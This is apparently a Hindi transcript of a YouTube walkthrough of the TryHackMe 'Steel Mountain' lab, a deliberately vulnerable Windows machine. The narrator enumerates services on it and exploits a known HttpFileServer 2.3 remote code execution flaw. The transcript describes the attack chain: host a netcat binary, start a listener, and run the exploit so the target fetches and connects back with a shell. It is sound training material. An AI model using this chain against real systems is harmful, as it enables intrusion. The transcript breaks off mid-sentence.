हाय एवरीवन, वेलकम बैक टू माय यूट्यूब चैनल। और आज इस वीडियो में हम ट्राई हैक के ऊपर एक बॉक्स करने वाले हैं जिसका नाम है स्टील माउंटेन। तो ये एक विंडोज बेस्ड बॉक्स है जिसके अंदर हम बेसिकली सबसे पहले क्या करेंगे, सबसे पहले हम देखेंगे कि कैसे हम इस मशीन को एक्सेस कर सकते हैं, मतलब कि हैक कर सकते हैं और इनिशियल फुटहोल्ड ले सकते हैं, और उसके बाद कैसे हम प्रिविलेज एस्केलेशन कर सकते हैं विंडोज के जो प्रिविलेज एस्केलेशन मेथड्स हैं उनके थ्रू। तो इसमें जो इन्होंने मेथड्स बताए हैं, तो इसमें इन्होंने ऑलरेडी दो मेथड बताए हुए हैं। एक है कि आप मेटास्प्लॉइट का यूज करके प्रिविलेज एस्केलेट कर सकते हो, और एक है जिसके अंदर आप विदाउट मेटास्प्लॉइट प्रिविलेज एस्केलेट कर सकते हो। तो हम विदाउट मेटास्प्लॉइट देखेंगे, और अगर आप मेटास्प्लॉइट का मेथड देखना चाहते हो तो उसके लिए भी मैं सेपरेट वीडियो बना दूंगा। बट आई वुड रिकमेंड कि आप विदाउट मेटास्प्लॉइट इसको ट्राई करें। तो चलिए इस वीडियो को स्टार्ट करते हैं। और यहाँ पे मैं चलता हूँ अपने कल लिनक्स पे। तो यहाँ पे ऑलरेडी मैं वीपीएन के साथ कनेक्टेड हूँ इस मशीन पे। तो अगर मैं इस पे पिंग करूँ तो पिंग कर देते हैं इसको एक बार। और मेरी टारगेट मशीन का आईपी एड्रेस है 10.10.66.131। तो यहाँ पे मैं पिंग कर पा रहा हूँ। तो सबसे पहला काम क्या है, सबसे पहला काम है मेरा nmap स्कैन रन करना, और ताकि मैं पता कर सकूँ कि इसके ऊपर कितने पोर्ट्स ओपन है मेरे पास। तो यहाँ पे कमांड डालूंगा मैं nmap डैश a डैश t4, और इस तरीके से। ठीक है। तो यहाँ पे मैंने क्या किया, यहाँ पे बेसिकली ए से मैं सर्विस डायरेक्शन के लिए यहाँ पे डैश ए यूज कर रहा हूँ, डैश टी4 ताकि स्पीड हमारी अच्छी हो स्कैन की, डैश पी डैश ताकि हम सारे पोर्ट स्कैन कर सकें, और डैश वी हमारा वर्बोस के लिए है, जो बेसिकली यहाँ पे रियल टाइम में आउटपुट दिखाता जाएगा मेरे को स्क्रीन पे, जो भी ये फाइंड करेगा। साथ में उसका आईपी एड्रेस दे दिया मेरी मशीन का, जो कि मेरे सिनेरियो में डिफरेंट है, तो आईपी एड्रेस चेंज कर देते हैं। आईपी एड्रेस है 66.131। और उसके बाद डैश ओ ए बेसिकली यहाँ पे बता रहा हूँ कि भाई इसका जितना भी आउटपुट आएगा उसको मेरे को एक इस फाइल के अंदर सेव कर देना है, nmap अंडरस्कोर स्कैन नाम की। तो यहाँ पे आप इसको इस तरीके से रन कर सकते हो और आपका जो है स्कैन कंप्लीट हो जाएगा। तो मैंने ऑलरेडी यहाँ पे स्कैन कंप्लीट किया हुआ है। तो मेरे सिनेरियो में क्या करूँगा, इसको पेस्ट कर देते हैं, और मेरे को इसके अंदर कुछ नहीं मिलेगा। ओके। तो मैंने ऑलरेडी ये पहले बॉक्स किया था, ठीक है, और मैंने ऑलरेडी स्कैन रन किया हुआ था इसका, क्योंकि यूजली ये टाइम लगाता है nmap जो है। तो हम क्या करेंगे, nmap की सीधी फाइल कर लेते हैं ओपन। आपके सिनेरियो में आपको स्कैन रन करना पड़ेगा, वेट करना पड़ेगा, बट मेरे सिनेरियो में मैंने ऑलरेडी किया है तो मैं यहाँ पे वेट नहीं करूंगा। तो ट्राई हैक मी, और इसके अंदर मैंने स्टील माउंटेन nmap, और यहाँ पे मेरे को ये रहा स्कैन। तो यहाँ पे ये रिजल्ट आएगा आपको स्कैन के अंदर। तो यहाँ पे आपको दिख जाएगा कितने सारे पोर्ट्स इसने दिखा दिए, जो कि फिल्टर्ड है और अननोन है, बट हम ढूंढ रहे हैं ओपन पोर्ट्स को। तो यहाँ पे स्क्रॉल अप करूं तो यहाँ पे दिखा देगा सबसे पहले पोर्ट 80 ओपन है हमारा, एच टी टी पी माइक्रोसॉफ्ट आई आई एस 8.5 चल रहा है जिस पे। उसके बाद हमारा एस एम बी के लिए पोर्ट्स ओपन है यहाँ पे 135 139 एंड 445। तो इसको हम आगे फर्दर एनुमरेट कर सकते हैं, और यहाँ पे ये वर्जन भी बता रहा है हमारे माइक्रोसॉफ्ट सर्वर, या तो ये 2008 R2 है या फिर 2012 R2 हो सकता है। उसके बाद यहाँ पे 3389 आरडीपी भी ओपन है हमारा। तो यहाँ पे इन्होंने बताया नहीं है सर्विस कौन सी आरडीपी है कि नहीं, बट मैं गेस कर रहा हूँ कि आरडीपी होगा, क्योंकि बाय डिफॉल्ट जो विंडोज होता है उसका विंडोज के लिए आरडीपी पोर्ट जो होता है वो 3389 ही होता है। ठीक है। उसके बाद हमारा 5985 है। ये भी एक वेब सर्वर है जो बेसिकली जिसपे टाइटल कुछ भी नहीं है, तो आई थिंक ये जस्ट लिसन कर रहा है। आई एम नॉट श्योर अगर इसके ऊपर कुछ होगा कि नहीं। उसके बाद हमारा पोर्ट 8080 है, जिसके ऊपर एच एफ एस 2.3 ये बता रहा है कि ये सर्वर एड्रेस का, और ये फाइल सर्वर है। तो यहाँ पे हमको ऑलरेडी कुछ इन्फॉर्मेशन मिल गई है। तो हम क्या करेंगे, सबसे पहले हम लो हैंगिंग फ्रूट से स्टार्ट करते हैं। तो मेरे लिए लो हैंगिंग फ्रूट ऑलवेज होता है एसएमबी। तो एसएमबी को मैं जितना इन्यूमरेट कर सकूं उतना कोशिश करता हूँ। तो सबसे पहले क्या करता हूँ, एक नोट पैड ओपन कर लेता हूँ, ताकि मैं यहाँ पे जितनी भी इन्फॉर्मेशन हमको मिली है इसको हम सेव कर लें। तो यहाँ पे हम लिख देते हैं इस तरीके से। अ, सबसे पहले हम एसएमबी को एन्यूमरेट करेंगे, राइट। तो एसएमबी के लिए हमारे पास पोर्ट, ये सारे एसएमबी के पोर्ट नहीं होते, बट एसएमबी के काइंड ऑफ आसपास ही फॉलो करते हैं, तो इसलिए मेन हमारा होता है 139 एंड 445। ठीक है। उसके बाद यहाँ पे न्यू टैब ओपन कर लेता हूँ। अब एसएमबी को एन्यूमरेट करने का तरीका क्या है, सबसे पहले हम एसएमबी क्लाइंट, हमारा एक एसएमबी क्लाइंट होता है, इसको यूज करेंगे इस तरीके से डैश एल, और हमारा मशीन का आईपी एड्रेस इस तरीके से। तो ये कमांड क्या करती है, बेसिकली मेरे को बता देगा कि इस मशीन के ऊपर
अगर कोई शेयर्स अवेलेबल हैं कि नहीं, ठीक है। तो यहाँ पे अगर एंटर करूं तो ये पासवर्ड मांग रहा है, अनोनिमस डाल देते हैं। तो यहाँ पे इसने मेरे को एरर दे दिया भाई, अनोनिमस फेल्ड। मतलब कि यहाँ से हम गेस कर सकते हैं अनोनिमस लॉगिन जो है फेल्ड है इसके लिए। और हमको कोई रिजल्ट नहीं आया, हमको कुछ पता नहीं है कि इसके ऊपर कोई शेयर्स अवेलेबल हैं कि नहीं अभी। ठीक है। तो अगर एसएमबी क्लाइंट ने काम नहीं किया तो हम क्या करेंगे, हम nmap का यूज कर सकते हैं। nmap की एक स्क्रिप्ट होती है जो एसएमबी के लिए हम यूज कर सकते हैं स्कैनिंग के लिए। तो nmap की स्क्रिप्ट का हम यूज कर सकते हैं। तो यहाँ पे nmap की स्क्रिप्ट मेरी अ, यहाँ पे डॉक्यूमेंटेशन में है, तो मैं इसको कॉपी एंड पेस्ट कर लेता हूँ इस तरीके से। और यहाँ पे आईपी एड्रेस बदल देंगे इसका, जो कि है इस तरीके से। तो यहाँ पे इस nmap का यूज कर सकते हैं स्क्रिप्ट का। तो nmap डैश p और पोर्ट नंबर जिसको हम स्कैन कर रहे हैं वो है 445। और ये आपकी स्क्रिप्ट का नाम है। जो दो स्क्रिप्ट्स यूज कर रहे हैं हम, ठीक है। इन्यूमरेट करो शेयर्स को और एन्यूमरेट करो यूजर्स को। तो ये शेयर्स को भी एन्यूमरेट करेगा और यूजर्स को भी एन्यूमरेट करके देगा इस पे। और ये आईपी एड्रेस तो एंटर करता हूँ। और जब तक, ऑलराइट, तो ये फास्ट था। तो 2.50 सेकंड में इसने कंप्लीट कर दिया सब कुछ, जिसने मेरे को कोई रिजल्ट नहीं दिया। तो यहाँ पे भी हमको कुछ नहीं पता चला। नेक्स्ट हम क्या कर सकते हैं, हम मेटास्प्लॉइट के स्कैनर का यूज कर सकते हैं। जो ऑक्सिलरी स्कैनर होता है मतलब मेटास्प्लॉइट का, उसका यूज कर सकते हैं स्कैन करने के लिए, वर्जन वगैरह चेक करने के लिए एसएमबी का। तो यहाँ पे एमएसएफ कंसोल। राइट। तो यहाँ पे क्या करूंगा, मैं सर्च करूंगा एस एम बी अंडरस्कोर वर्जन, अगर मेरे को कोई वर्जन के लिए स्कैनर कोई मिलता है कि नहीं। तो यहाँ पे जैसे ही सर्च करूंगा तो यहाँ पे मेरे को ये रिजल्ट आ जाएगा, दी ऑक्सिलरी स्कैनर एस एम बी वर्जन। तो एस एम बी वर्जन डिटेक्शन के लिए यूज होता है ये। तो इसको मैं यूज कर लेता हूँ इससे। यूज जीरो। जीरो मैंने इसलिए दिया क्योंकि यहाँ पे इसकी आईडी जीरो दिखा रहा है। मैं अगर इसको कॉपी पेस्ट करके इस तरीके से कर दूं यूज, अगर मैं इसको इस तरीके से कर दूं तो इस तरीके से ये भी कर लेता है, ठीक है। शो ऑप्शंस। और यहाँ पे हमको सिर्फ एक ऑप्शन बताना है जो कि हमारा रिमोट होस्ट। ठीक है। तो रिमोट होस्ट मतलब कि उसका आईपी एड्रेस देना हमको हमारे विक्टिम मशीन का। तो यहाँ पे आईपी एड्रेस है इसका सेट आर होस्ट इस तरीके से, और रन। तो यहाँ पे इसने रिजल्ट दिया कि एसएमबी वर्जन है 3.0.2। तो ये हमको इंफॉर्मेशन यहाँ पे सेव कर लेनी चाहिए इस तरीके से। एसएमबी 3.0.2 चल रहा है। एंड यहाँ पे हमको इसने ये भी बताया कि बैकएंड में जो मशीन चल रही है उसका नाम है स्टील माउंटेन इस तरीके से। ठीक है। और ये रन कर रहा है विंडोज 2012 R2 डाटा सेंटर, बिल्ड नंबर है जिसका ये। तो ये हमारे लिए इंपॉर्टेंट हो सकती है इन्फॉर्मेशन, तो इसको भी हम यहाँ पे इस तरीके से सेव कर लेंगे। तो ये इंपॉर्टेंट किस लिए है, इंपॉर्टेंट इसलिए कि सब अभी तो हमारा काम हो रहा है एन्यूमरेशन का, हम जितनी इंफॉर्मेशन फाइंड कर सकते हैं उतनी फाइंड करेंगे। उसके बाद जब हमारा फेज आएगा एक्सप्लॉइटेशन का, तो हमको ये सारी इंफॉर्मेशन की जरूरत पड़ेगी। क्या पता हमको कोई इस सर्वर के रिलेटेड, इस वर्जन के रिलेटेड कोई वल्नरेबिलिटी मिल जाए जिसको हम एक्सप्लॉइट कर सके। तो इसलिए ये चीज करनी भी जरूरी है। यहाँ पे एग्जिट कर जाता हूँ मेटास्प्लॉइट से। और एसएमबी के अंदर बस हमको यही पता चला अभी तक, हमको अनोनिमस लॉगिन नहीं मिला। अब नेक्स्ट स्टेप मेरा क्या है, नेक्स्ट स्टेप इन्होंने, हम क्वेश्चंस भी देखते रहते हैं जो इन्होंने पूछे। तो क्वेश्चन इन्होंने सबसे पहले पूछा है हु इज द एम्प्लॉय ऑफ द मंथ। ठीक है। तो यहाँ पे पहला क्वेश्चन ही यही है। तो एम्प्लॉय ऑफ द मंथ क्या है। तो यहाँ पे क्या करेंगे हम, अब हमको एसएमबी में कुछ नहीं मिला तो एसएमबी को एक्सक्लूड कर देते हैं। अब हम चलते हैं पोर्ट 80 पे, जो कि हमारा वेब सर्वर है। तो यहाँ पे सीधा मैं वेब ब्राउजर ओपन कर लेता हूँ। और यहाँ पे ये दिखाया है एम्प्लॉय ऑफ द मंथ, ये बंदा है जो भी है, इसका नाम नहीं दिया। चेक करते हैं हम नाम क्या है। तो यहाँ पे हमको
ये वेपलाइजर की एक्सटेंशन है जो बेसिकली बता देती है कौन कौन सी सर्विसेज रन हो रही है, मतलब क्या क्या इंफॉर्मेशन दे सकता है आपको वेब पेज एक। तो यहाँ पे हमको बताया जा रहा है IIS 8.5 रन हो रहा है इस पे बैकएंड में। तो यहाँ पे इस तरीके से इसको भी हम सेव कर लेंगे, पोर्ट 80 जो कि है IIS आई थिंक 8.5, 8.5 राइट। अब यहाँ पे राइट क्लिक करूंगा, व्यू पेज सोर्स देख लेते हैं, और सोर्स कोड के अंदर यहाँ पे इमेज का सोर्स क्या है, इमेज का सोर्स है बेसिकली इमेज बिल हार्पर डॉट png। तो वी कैन एज्यूम के ये इमेज जो है ये बिल हार्पर की है, बंदे का नाम बिल हार्पर है, ठीक है। तो यहाँ पे क्या करूंगा, यहाँ पे सिंपल आंसर में भर देते हैं हम बिल हार्पर, जो कि करेक्ट था। ओके, तो पहला फ्लैग हमको मिल गया जो कि इन्होंने दिया था, फ्लैग नहीं मतलब जो इन्होंने क्वेश्चन पूछा था वो मिल गया। सेकंड हमारा इनिशियल एक्सेस, नाउ यू हैव डिप्लॉयड द मशीन, लेट्स गेट एन इनिशियल एक्सेस। तो यहाँ पे ये पूछ रहे हैं स्कैन करो मशीन को और व्हाट इज द अदर पोर्ट रनिंग अ वेब सर्वर ऑन। तो दूसरा पोर्ट जो वेब सर्वर रन कर रहा है, तो इससे पहले कि हम दूसरे पोर्ट पे जाएं तो क्यों ना कुछ इन्यूमरेशन यहाँ पे की जाए, जैसे कि robots डॉट टी जो कि यहाँ पे हमको कुछ मिला नहीं इसके ऊपर। नेक्स्ट हम क्या करेंगे, नेक्स्ट हम निक्टो का यूज कर सकते हैं, निक्टो -h, और इस तरीके से, और यहाँ पे निक्टो हमारा रन हो रहा है, नए टैब में हम रन कर लेंगे अपना डर्ब या गोबस्टर यूज कर लेते हैं, ऐसे करते हैं गोबस्टर। तो यहाँ पे ये बेसिकली इस तरीके से इसको करता जाएगा स्कैन। अब यहाँ पे मैं आई वुड रिकमेंड कि इन स्कैन्स को आप कंप्लीट होने दें, ठीक है, और देखें इनको, एनुमरेट करें इसको फर्दर कि आपको यहाँ पे कुछ मिलता है कि नहीं। सो फॉर द सेक ऑफ दिस वीडियो, ताकि ये वीडियो लंबी ना हो, मैं आपको भी बता देता हूँ इस पेज, इस वेब सर्वर पे हमको कुछ नहीं मिलेगा, इस पोर्ट पे, पोर्ट 80 पे हमको कुछ नहीं मिलेगा। अब अगर आप स्कैन पे दोबारा वापस जाओ, तो स्कैन में इन्होंने बताया था भी पोर्ट 80 पे हमारा स्कैन रन हो रहा था, पोर्ट 80 पे वेब सर्वर रन हो रहा था, हमको कुछ नहीं मिला, ऑलराइट। अब दूसरा वेब सर्वर कौन सा हो सकता है, तो दूसरा इन्होंने बताया एक 5985 जो कि HTTP है। तो लेट्स ट्राई 5985 पे हमको कुछ मिलता है कि नहीं। तो यहाँ पे क्या करूंगा मैं, इतने हिस्सों को काट के 5985, और यहाँ पे मेरे को आ गया पेज नॉट फाउंड, मतलब कि ये वाले भी हमारी एनुमरेशन से बाहर चला जाता है, क्योंकि इस पे हमको कुछ मिला नहीं, पेज है ही नहीं। ये जस्ट पोर्ट ओपन है, प्रॉबेबली किसी सर्विस को लोकली लिसन कर सकता है, आई डोंट नो, बट हाँ राइट नाउ इस पोर्ट पे हमको कुछ भी नहीं मिलेगा। नेक्स्ट है हमारा पोर्ट 8080 जिसपे भी HTTP रन हो रहा है, तो पोर्ट 8080 पे चलते हैं। यहाँ पे क्या करता हूँ, यहाँ 5985 को मूव करके 8080, और जैसे ही हम पोर्ट 8080 पे आए, तो यहाँ पे आप देखोगे कि ये एक वेब पेज बता रहा है। तो यहाँ पे हमको कुछ ज़्यादा खास देखने को नहीं मिला, बट यहाँ पे अगर आप इन्फॉर्मेशन को प्रॉपरली रीड करोगे, तो यहाँ पे ये सर्वर की इन्फॉर्मेशन को लीक कर रहा है। तो जैसे कि ये बता रहा है सर्वर इन्फॉर्मेशन, सर्वर की इन्फॉर्मेशन क्या है, HTTP फाइल सर्वर 2.3, तो जो कि एक क्रिटिकल है, मतलब कि क्रिटिकल इंफॉर्मेशन लीक है यहाँ पे। बैकएंड में क्या इंफॉर्मेशन है इस सर्वर की वो बता रहा है हमको, ये क्या सर्विस है वर्जन नंबर के साथ। यहाँ पे क्या करूंगा, इसको भी मैं इस तरीके से सेव कर लेते हैं, पोर्ट 8080, और ये चल रहा है हमारा HTTP फाइल सर्वर 2.3, राइट। अब लॉगिन करके देख लेते हैं, इस पे लॉगिन कर सकते हैं हम कि नहीं। तो एडमिन, एडमिन, नो, एडमिन पासवर्ड, नो, एडमिन स्टील माउंटेन, नहीं, तो कुछ भी नहीं चल रहा। ये आप ट्राई कर सकते हो इन्फॉर्मेशन। तो यहाँ पे ये बता रहा है इधर योर यूजर नेम इज फॉल्स और पासवर्ड इज जो भी, राइट। तो यहाँ पे ये चीज़ तो काम नहीं की। नेक्स्ट क्या है, नेक्स्ट यहाँ पे बटन्स पे क्लिक करते हैं, देखते हैं कहाँ लेके जाता है हमको ये।
उसके बाद यहाँ पे राइट, तो यहाँ पे ज्यादा इन्फॉर्मेशन हमको मिल नहीं रही इधर से कुछ, ठीक है। तो क्या कर सकते हैं हम, यहाँ पे इस यूआरएल को कॉपी करते हैं और क्यों ना निक्टो का दोबारा यूज करें। अब इस निक्टो को क्लोज कर देता हूँ मैं, क्योंकि मैंने ऑलरेडी बता दिया यहाँ पे हमको कुछ मिलेगा नहीं। तो निक्टो डैश एच, और अब हम पोर्ट 80 को निक्टो से स्कैन करवाएंगे इस तरीके से। और सेम चीज हम यहाँ पे करेंगे। अ, तो डर्ब का यूज कर लेते हैं, ये थोड़ा फास्ट है इस तरीके से। तो हमारे पास मल्टीपल स्कैनर्स होते हैं वेबसाइट को एनिमेट करने के। एक होता है जैसे कि डरबस्टर, एक है हमारा डर्ब, ठीक है। डर्ब थोड़ा फास्ट है। उसके बाद हमारा गोबस्टर, वो भी फास्ट है पर कई बारी स्लो होता है। तो हमारे सिनेरियो में हम डर्ब यूज कर लेते हैं, तो ये लिटिल बिट फास्ट होगा, तो यहाँ पे इसको कर देते हैं एंटर। और देखते हैं हमको ये कुछ ढूंढ के देता है कि नहीं। और निक्टो तो हमारा साथ में काम कर ही रहा है, राइट। तो जब तक ये इंफॉर्मेशन हमारी ढूंढी जा रही है निक्टो के थ्रू एंड हमारे दर्ब के थ्रू, जब तक हम क्यों ना थोड़ी गूगल सर्च करें और देखें कि HTTP फाइल सर्वर के रिलेटेड हमको कुछ मिलता है कि नहीं। तो गूगल सर्च करने से पहले क्या करूंगा मैं, सिंपल सर्च एक्सप्लॉइट का यूज करूंगा। सर्च एक्सप्लॉइट बेसिकली एक्सप्लॉइट डाटाबेस की जो कॉपी होती है वो आपके लिनक्स मशीन पे स्टोर करके रखता है, ठीक है। वो अप टू डेट नहीं होती है, आपको अपडेट अपडेट करनी पड़ती है मैनुअली, टाइमली मैनर के अंदर। बट मोस्ट ऑफ द टाइम आपको यहाँ पे एक्सप्लॉइट्स मिल जाते हैं पुराने। अब ये एक्सप्लॉइट डाटाबेस की ही कॉपी है, तो हम क्यों ना गूगल पे जाने की बजाय सीधा एक सर्च एक्सप्लॉइट का यूज करें और सीधा फाइल सर्वर जो हमारा इंफॉर्मेशन मिली है यहाँ पे HTTP फाइल सर्वर, इसकी इंफॉर्मेशन यहाँ पे डाल के देखते हैं। तो यहाँ पे इस तरीके से इसका यूज करना है, HTTP फाइल सर्वर एंटर। तो यहाँ पे एक मिला है रेजेटो HTTP फाइल सर्वर 2.3, और हमारा वर्जन भी 2.3 है। ऑलराइट, उसके बाद यहाँ पे इसने बोला रिमोट कोड एग्जीक्यूशन, जो कि अगर ये काम कर गया तो सीधा हम सर्वर पे रिमोटली कोड रन करवा सकते हैं। और विंडोज बेस्ड है ये, विंडोज बेस्ड है, तो भी हमको एक कंफर्मेशन मिल जाती है कि अच्छा विंडोज के लिए बना है, तो प्रोबेबली हमारा ये एक्सप्लॉइट हो सकता है। नेक्स्ट है हमारा यहाँ पे इस कोड को रीड करना हमने, जो इसके अंदर ये पाइथन की स्क्रिप्ट है। तो क्या करूंगा मैं, इतने हिस्सों को कर लूंगा कॉपी इस तरीके से, और यहाँ पे दोबारा सर्च एक्सप्लॉइट का यूज करूंगा। उसके बाद डैश एक्स, और उसके बाद मेरी जो ये कॉपी की थी मैंने, अब डैश एक्स से क्या होगा, डैश एक्स से मैं इस स्पेसिफिक एक्सप्लॉइट को ओपन करके अपने टर्मिनल पे रीड कर सकता हूँ। तो यहाँ पे कर देता हूँ एंटर, और यहाँ पे हमारा एक्सप्लॉइट ओपन हो गया। तो यहाँ पे आप देखोगे तो यहाँ पे ये कुछ इस तरीके से इंफॉर्मेशन दे रहा है, जो कि सुंदर नहीं लग रही, राइट। तो क्यों ना हम इसको क्यू दबाता हूँ, क्विट कर देता हूँ, और यहाँ पे मेरे को पूरा पाथ मिल जाएगा। आपको ये भी बता देगा एक्सप्लॉइट डाटाबेस का यूआरएल क्या है, और यहाँ से आप कॉपी भी कर सकते हो आपके लोकल सिस्टम में से। तो यहाँ पे इतने हिस्से को कर लेता हूँ कॉपी, और यहाँ पे सीपी पेस्ट करंट डायरेक्टरी में इस तरीके से। तो यहाँ पे ये है, राइट। तो नैनो 49, तो यहाँ पे हमारा अब ये कलरफुल आउटपुट दे रहा है एज कम्पेयर टू सर्च एक्सप्लॉइट में जब हमने ओपन किया था उसके मुकाबले, ठीक है। तो इजी हो जाएगा थोड़ा रीड करना। तो यहाँ पे नीचे चलते हैं, और यहाँ पे आप देखोगे यूजेज वाला सेक्शन, जो कि ये बता रहा है यूज कैसे करना है इसको। तो यूज करने का सिंपल, आपको कमांड डालनी है पाइथन 3, उसके बाद आपके जो ये फाइल है उसका नाम, उसके बाद रिमोट होस्ट, मतलब कि हमारे टारगेट मशीन का IP एड्रेस, टारगेट मशीन जो हमारी जिस पे लिसन कर रही है वो पोर्ट नंबर, और जो कमांड हम एग्जीक्यूट करवाना चाहते हैं, ठीक है। एग्जाम्पल भी दिया हुआ है इन्होंने, जैसे कि ये, और जो भी आप रन करवाना चाहते हो, राइट। तो यहाँ पे अगर हम कोड को प्रॉपरली रीड करें एक बार, तो कोड क्या कर रहा है, तो कोड बेसिकली पाइथन 3 HTTP, आई डोंट थिंक ये कोड प्रॉपर है यहाँ पे। तो क्यों ना सर्च प्लॉट को छोड़ के हम दोबारा गूगल पे चलते हैं, और यहाँ पे HTTP फाइल फाइल, ओके, ओके।
तो यहाँ पे पहला मिल गया रिमोट, ये सेम ही है जो यहाँ पे ओपन हुआ है। या सो या तो यहाँ पे ये देखोगे ना, तो ये लिटिल बिट डिफरेंट है एज कम्पेयर टू जो हमने यहाँ पे डाउनलोड किया है बिलीव। हाँ, तो यहाँ पे ये प्रॉपरली नहीं है, प्रॉपर इंफॉर्मेशन नहीं है इसकी। तो इसलिए अगर अप टू डेट ना हो आपका लोकल डाटाबेस सर्च एक्सप्लॉइट का, तो ये आपको इस तरीके से गलत कोड भी प्रोवाइड कर सकता है। तो जो कि हमको हमारे सिनेरियो में इसने प्रोवाइड किया, तो ये गलत है, ठीक है, ये प्रॉपरली नहीं है कोड यहाँ पे। तो इसका यूज नहीं करेंगे हम। ये सेम कोड हमको यहाँ पे मिल रहा है ऑनलाइन, तो यहाँ पे इस कोड का यूज करते हैं, यहाँ पे रीड भी कर लेते हैं कोड को। तो यहाँ पे यूजेज बताई हुई है इन्होंने जिस तरीके से हमको इसको यूज करना है। उसके बाद यहाँ पे बताया हुआ कि कैसे यूज कर रहा है ये कोड, ठीक है। तो ये बेसिकली क्या कर रहा है, तो यहाँ पे तो हम अपना लोकल मशीन का, हमारी अटैकर मशीन का आईपी एड्रेस डालेंगे, हमारी अटैक मशीन का पोर्ट नंबर डालेंगे जिस पे हम लिसन करेंगे, ठीक है। उसके बाद यहाँ पे ये बेसिकली क्या कर रहा है, एक स्क्रिप्ट क्रिएट कर रहा है, वीबी स्क्रिप्ट आई बिलीव। और उसके बाद ऑलराइट, तो यहाँ पे ये बेसिकली क्या कर रहा है, यहाँ पे हमको क्या करना है मैं बता दूं। तो यहाँ पे ये नोड दिया हुआ है इसने, जिसने भी ये एक्सप्लॉइट बनाया, तो इसने बोला यू नीड टू बी यूजिंग अ वेब सर्वर होस्टिंग नेटकैट। तो हमको एक नेटकैट, हमको नेटकैट की बाइनरी जो है अपने सिस्टम पे होस्ट करनी पड़ेगी। मतलब एक वेब सर्वर होस्ट करेंगे हम, नेटकैट की बाइनरी डालेंगे उसमें, और एक और टर्मिनल सेशन में हम नेटकैट का लिसनर स्टार्ट करेंगे। उसके बाद जब हम इस एक्सप्लॉइट को रन करेंगे अपनी टारगेट मशीन के अगेंस्ट, तो यहाँ पे इस कोड के थ्रू हमारी टारगेट मशीन को हम फोर्स करेंगे कि वो हमारे वेब सर्वर पे जो हमने होस्ट किया वहां से नेटकैट की बाइनरी उठाए और नेटकैट को एग्जीक्यूट करे, और नेटकैट का एग्जीक्यूशन बेसिकली हमारे इस लोकल पोर्ट पे लिसन कर रहा होगा और इस पे कनेक्ट करेगा। तो इस तरीके से ये काम कर रहा है। सिंपल मैं क्या करता हूँ, यहाँ पे इसको डाउनलोड कर लेता हूँ। उसके बाद हमको चाहिए नेटकैट की बाइनरी विंडोज के लिए, तो यहाँ पे गूगल पे सर्च कर लेते हैं नेटकैट विंडोज बाइनरी। तो पहले भी चलते हैं यहाँ पे गिटहब पे, और यहाँ पे हमको मिल जाएंगे नेटकैट 64 और नेटकैट 32 बिट। तो यहाँ पे 32 बिट वाला यूज कर लूंगा मैं, 64 वाला भी ट्राई कर सकते हो। मैंने 64 बिट पहले ट्राई किया था, तो पर 64 बिट काम नहीं किया, क्योंकि हमारी जो टारगेट मशीन है वो 64 बिट नहीं है, वो 32 बिट है आई बिलीव, आई थिंक। बट हाँ, 32 बिट काम करता है यहाँ पे। तो यहाँ पे सिंपल इसको कर लोगे आप डाउनलोड इस तरीके से, हमारी नेटकैट की बाइनरी डाउनलोड होगी, हमारा एक्सप्लॉयर डाउनलोड हो गया। अब हम चलते हैं अपने टर्मिनल पे और इसको कर देते हैं क्लियर। और मैं डाउनलोड फोल्डर के अंदर मूव कर जाता हूँ, सीधा डाउनलोड फोल्डर से ही काम कर लेंगे। तो rm -f, ठीक है। तो यहाँ पे हमारा एक्सप्लॉइट है और हमारी नेटकैट की बाइनरी है। तो एक्सप्लॉइट को एडिट करते हैं सबसे पहले। तो यहाँ पे नैनो, और यहाँ पे हमको एक एडिटिंग के अंदर लोकल पोर्ट एडिट करना है सबसे पहले। तो आईपी एड्रेस है हमारा जो लोकल, तो यहाँ पे मैं अपनी लिनक्स मशीन का आईपी डाल दूंगा जो कि है 1.38.241, और जिसमें मैं लिसन करूंगा तो 443 छोड़ देता हूँ, ठीक है। तो इतना काम हो गया, हमारा एक्सप्लॉइट जो है मॉडिफाई हो चुका है, chmod+x, और ताकि इसको एग्जीक्यूटेबल परमिशन मिल जाए। नेक्स्ट, एक नया टैब ओपन करते हैं जिसपे हम नेटकैट का लिसनर स्टार्ट करेंगे। तो हमको नेटकैट का लिसनर स्टार्ट करना है nc-nvlp इस तरीके से, और जिस पोर्ट पे हम लिसन करना चाहते हैं उस पोर्ट का नंबर 443 पे, क्योंकि हमारा जो एक्सप्लॉइट है वो 443 के लिए बनाया गया है, ठीक है। आप नंबर चेंज कर सकते हो एक्सप्लॉइट के अंदर अगर आप डिफरेंट पोर्ट पे लिसन करना चाहते हो तो। उसके बाद हमारा -s, ताकि मैं स्पेसिफिक आईपी एड्रेस को बाइंड कर सकूं अपने सिस्टम पे, और कर दूंगा एंटर। तो हमारा ये लिसन कर रहा है इस तरीके से।
अब नेक्स्ट क्या बोला इन्होंने, अब आप एक्सप्लॉइट को पढ़ो तो एक्सप्लॉइट के अंदर नेक्स्ट चीज बोलिए यहाँ पे हमको ये रन करने से पहले एक वेब सर्वर होस्ट करना पड़ेगा जहां पे हमारी नेटकैट की बाइनरी हो। तो नेटकैट की बाइनरी हमारी यहीं पे पड़ी है तो यहीं पे मैं वेब सर्वर होस्ट कर दूंगा इस तरीके से। तो हमारे कल लिनक्स पे अब वेब सर्वर होस्ट हो रहा है पोर्ट 80 पे। उसके बाद अब हमको सिंपल इस एक्सप्लॉइट को रन करना है। तो एक्सप्लॉइट को रन करने के लिए मैं क्या करता हूँ, यहाँ पे इसको क्लोज कर देते हैं। तो मूव कर जाते हैं हमारे डाउनलोड फोल्डर में और यहाँ पे यूजेज क्या है इसकी, पाइथन हमारा जो एक्सप्लॉइट है ये, एंड पाइथन पी वाई टारगेट आईपी एंड टारगेट पोर्ट नंबर, सिंपल। तो टारगेट आईपी क्या है हमारी, टारगेट आईपी है ये, और टारगेट पोर्ट नंबर क्या है 8080। यहाँ पे ये रन हो गया इस तरीके से। अब अगर हम इस वेब सर्वर पे जाएं तो यहाँ पे आप देखोगे तो वेब सर्वर पे हमारी रिक्वेस्ट की गई। तो यहाँ पे हमारा जो ये आईपी एड्रेस है, मतलब कि हमारा जो विक्टिम है उसका आईपी एड्रेस शो कर रहा है, मतलब कि जैसे ही हमने एक्सप्लॉइट रन किया तो यहाँ पे हमारे वेब सर्वर से ये चीज डाउनलोड की गई। नेक्स्ट अगर मैं इस पे जाऊँ तो यहाँ पे ये अभी भी लिसन ही कर रहा है, अभी भी कोई एक्सप्लॉइट एग्जीक्यूट नहीं हुआ, काम नहीं किया कुछ। तो आप इसमें जाओगे ना इसके पेज 